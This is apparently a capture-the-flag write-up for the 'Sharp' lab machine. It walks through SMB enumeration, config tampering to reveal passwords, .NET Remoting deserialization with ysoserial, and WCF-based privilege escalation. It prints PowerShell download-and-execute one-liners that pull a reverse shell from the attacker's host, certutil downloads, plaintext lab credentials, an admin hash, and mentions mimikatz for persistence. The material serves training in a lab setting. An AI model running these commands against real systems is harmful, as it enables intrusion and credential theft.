Sharp - 3rd Jan 20

10.10.10.219

Enter a caption for this image (optional)

Scanning

We run masscan_to_nmap.py , a tool I made that you can find on my Github. It runs a Masscan,
identifies open ports, and then takes those open ports over to Nmap, and scans for versions and
default scripts against those ports.

1 PORT STATE SERVICE VERSION

2 135/tcp open msrpc Microsoft Windows RPC
3 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
4 445/tcp open microsoft-ds?
5 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6 8888/tcp open storagecraft-image StorageCraft Image Manager
7 8889/tcp open mc-nmf .NET Message Framing

Enumeration

When enumerating, I like to deal with ports that I either: have some familiarity with; and/or, that will
quickly let me know if I require credentials to progress further with that service.

SMB on 149 and 445 is a good first port of call (this is a terrible joke and I do not apologise).

SMB enum

We can first run smbmap -H 10.10.10.219 which shows us the directories in the SMB share, and also
the permissions that we do or do not have access to.

The kaban directory is accessible to us. We can take a note of this name too, as it may be a username
for later on. We can also use smbmap with the -R flag to list out all the files and directories inside of
the shares that we have access to:

To retrieve all of the files and save it to our machine, we can use
smbget -R smb://10.10.10.219/kanban

We downloaded some stuff for Windows, which we may have to (de)compile. Before going to a
Windows VM, however, I'd rather read through the files and docs and see if there are any quick and
easy wins

Kaban Files

We can use ack to search for strings that we think may be helpful - username, password, port, email,
etc etc.

1 #install ack
2 sudo apt-get install ack
3 #run it in our downloaded smb files
4 ack -i "password"
5 # the -i flag means ignore case, so look for password, Password, PASSWoRD etc

Think of ack like grep . As default, Ack trawls through files in our current working directory and
searches for the string we want. Also by default, it highlights the string but includes the entire
context.
Sometimes, grep can be complicated to get right, and also isolates a string from its wider context,
which can sometimes be misleading in my opinion

If we take a closer look at what we have here in PortableKanban.pk3, we have encrypted passwords
and some usernames too, with their respective privileges.

1 Administrator
2 ID: e8e29158d70d44b1a1ba4949d52790a0
3 Encrypted Password: "k+iUoOvQYG98PuhhRC7/rg=="
4
5 Lars
6 ID: 0628ae1de5234b81ae65c246dd2b4a21
7 Encrypted Password: "Ua3LyPFM175GN8D3+tqwLA=="

Read the Docs

Before trying to reverse engineer the .exe file to find out how the passwords are hashed, it's best to
read the user guide that accompanied these SMB files: firefox "User Guide.pdf"

Some important notes I take from reading the docs:

page 1: As the program is 'portable', it's at our mercy if we change config files
page 3: Blank passwords shouldn't be used - which says to me, it CAN be used but isn't advised
pages 11: There is the only one default user: “Administrator”with blank password.
page 18: suggests that if you forget your password, just take the portable .exe to a different
directory and try to execute it as Admin?
pp 22: "Passwords are hidden by default in Setup/Users tab."

Reading the docs, it seems to me like we need to relocate to a Windows VM, sign in as Administrator,
and try and find the decrypted passwords that may be waiting in Users?

I zipped the entire directory that we downloaded from the SMB share, and moved it to my windows VM.

Windows VM

Sign in as Admin

When we start the .exe, this interesting pop up let's us know that data from a pk3.bak is recovered.
Intresting

And yet when we try to sign in as Admin with a blank password, we don't sign in! So much for an easy
ride.

Config Manipulation

Let's return back to that first pop up: that the data was recovered from the pk3.bak file. When we open
it, we can see it's the same file we got the encrypted passwords from earlier

If the .exe calls on this backup file to restore it's own configurations, we may be able to remove the
existing password fields. It may possibly let us sign straight in - let's try.

What we need to do is remove this entire directory and the un-zip it fresh again. Now go and
manipulate the pk3.bak file.

If we open the pk3.bak file in notepad, and remove this value for the password so it shows we should
gain access . Be sure to Save the file as "All Files", and let it replace any file it wants.

Now, if we run the .exe and let it call on the pk3 backup, it will load the "blank password" and let's us
sign in as Administrator

Password Hunt

From our notes earlier, we gathered that we need to find the Users tab, as this is where we might find a
password. Click on the cog for setup. Then move to the Users tab

All that's left to do is un-hide the password box, and we get the password for Lars: G123HHrth234gRG

Make Lars Admin

Before we go and take these creds back to the SMB share, to see if we have access to anything new,
let's experiment with making Lars admin.

Delete the directory for the exe again. Unzip a fresh install, and edit the pk4.bak file again to change
Lars to Admin

And what do you know, if we make Lars admin in the config file, sign in, and look at the passwords
again, we get the Admin's too: G2@$btRSHJYTarg (spolier: we don't do much with the admin's
password)

Enumeration II

Test the Creds

Armed with credentials, we can begin a second round of enumeration back in our Kali VM

1 #users;passwords
2 administrator ; "G123HHrth234gRG"
3 lars ; "G2@$btRSHJYTarg"

If we put these into a respective users and passwords list in kali, and then run crackmapexec we can
see if we have any valid creds:
sudo crackmapexec smb 10.10.10.219 -u usernames.txt -p passwords.txt

Lars' creds are valid on the SMB share, so let's go and see if we have access to anything new.

SMB enum II

Running smbmap again with valid creds shows us we have access to a dev share:
smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219

Running the previous command with -R lists out what awaits us in the dev share. There isn't too
much here, so let's download it and take a look:

smbget -R smb://10.10.10.219/dev/ -U lars%G123HHrth234gRG

Zip II

Looks like we're gonna zip this new downloaded dev directory and pop it over to our Windows VM
again

Windows VM II

De-compiling

To figure out what these binaries are doing, we need to recompile them. dnspy is one such tool for
decompile .exes: https://github.com/dnSpy/dnSpy

Once you have dnspy, open up client.exe and start opening up the tabs on the left

The tab we're looking for is called remote sample, as this contains some interesting creds just hanging
out

The key information is that we now have creds for the service on port 8888, which we found earlier in
our nmap scan. We also have the directory/API to call on when we make the request too
(SecretSharpDebugApp......)

debug ; "SharpApplicationDebugUserPassword123!"

In Search of an Exploit

In this same dnspy tab, we can take the top string "Remoting.Channels.Tcp" and google it and ask for
an exploit. The third option on google is a github with a possible exploit:
https://github.com/tyranid/ExploitRemotingService

An excellent pre-compiled can be found here:

https://github.com/parteeksingh005/ExploitRemotingService_Compiled

Compile the Exploit

We'll need to compile this github exploit in visual studio community.

I'm not going to go into a crazy amount of detail here. If it's too difficult to make a working binary,
I'd suggest you use the pre-compiled binary above

Install the necessary libraries that visual studio asks for, and then traverse around the directories and
files on the left until you find ExploitRemotingService.csproj.

Click build and watch the output, which should tell you where the resultant client .exe is located.

Create a reverse shell

We need to complete a number of steps here, which aren't complicated but do need to be in a
particular order:

1. Download python for windows, and start a python web server: python3 -m http.server 80
2. Download netcat for windows and listen on the port for a reverse shell: nc64.exe -nvlp 4321
3. Download a nishang reverse shell, save it, and add this one-liner at the end of the file to have the
victim execute the reverse shell:
Invoke-PowerShellTcp -Reverse -IPAddress [Your IP] -Port [Your listner port]
4. Produce a serialised reverse shell by downloading Yososerial
5. Connect to the victim machine via the binary we compiled, with the attached the commands for a
reverse shell.

The first two steps are easy, so let's focus on the last two.

Yososerial

We can find Yososerial here

https://github.com/pwntester/ysoserial.net/releases/download/v1.34/ysoserial-1.34.zip

What we're going to do here is produce a serialised command to reach into our web server and grab
the reverse shell:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c

IEX(new-object net.webclient).downloadstring('http://10.10.14.8/Invoke-
PowerShellTcp.ps1')"

We're now going to take the long output and include it to the binary we built.

Remote connection .exe

And now let's run the binary with the serialised output:

ExploitRemotingService.exe -s --user=debug --
pass="SharpApplicationDebugUserPassword123!"
tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw
AAEAAAD/////AQAAAAAAAAAMAgAAA [etc etc]

Ignore the error output. What you want to focus on is your python web server. We should see the victim
machine pick up our reverse shell file.

And we have a shell as Lars

Lars Shell

We can get the user flag and then enumerate the machine to find a way to escalate our privileges.

In Lars' Documents, directory there's some stuff to do with wcf.

Let's bring the files back onto our Windows VM, and read them.

Transfer

We can zip the wcf directory:

Compress-Archive -LiteralPath C:\users\lars\Documents\wcf -DestinationPath
C:\users\lars\Documents\wcf.zip

And now, we can move the zipped folder to the dev smb we had remote access to:

move-item -path C:\users\lars\Documents\wcf.zip -destination c:\dev

Back on our windows VM, we can load the Dev share up:

1 net use X: \\10.10.10.219\dev

2 #Puts lars and his password in: G123HHrth234gRG

And if you look in your Windows VM network, the victim's dev SMB share will be there waiting as Drive
X

Exploring WCF

If we open up the .sln file that was in the WCF directory, we can read how it works in Visual Studio

We can look further into the Client's main function

This seems to connect to port 8889 running on the victim machine, which we will assume is a service
running as a privileged user.

The plan is then to add some malicious code for a reverse shell, re-compile this into a binary and
upload it to the victim, and then execute it to receive a privileged shell.

Build the Exploit

We can add a line underneath the last console.Write line . This will repeat the same way we got
the User shell.

Console.WriteLine(client.InvokePowerShell(" iex (new-object

net.webclient).downloadstring('http://10.10.14.8t/Invoke-PowerShellTcp.ps1')"));

Then build the solution, and note the directories that the client and remote .dll are.

Transfer II

Unfortunately, I wasn't able to just chuck these files back into the SMB share we networked too.
However I didn't try very hard to make it work.

Instead, I coped the client and wcf remote dll back into the directory where I set up my python web
server, and then pulled both of these onto the victim machine

certutil -urlcache -split -f "http://10.10.14.8/WcfRemotingLibrary.dll"

WcfRemotingLibrary.dll

certutil -urlcache -split -f "http://10.10.14.8/WcfClient.exe" WcfClient.exe

Privilege Escalation

In powershell, we can execute this client via .\WcfClient.exe

Be sure you have a netcat reverse shell waiting.

And we're root! This Shell won't last long, so be careful!

If you want to do post-root activities, upload a netcat binary and have the new system shell quickly
use this binary to create a new reverse shell.

You can use mimikatz to retrieve the admin's hash, for persistence.
9e2ede4a0c81d4ca7630ef1e8d30afb7

Previous Next

Normal Boxes JSON - 7th Dec 20

Last updated 12 seconds ago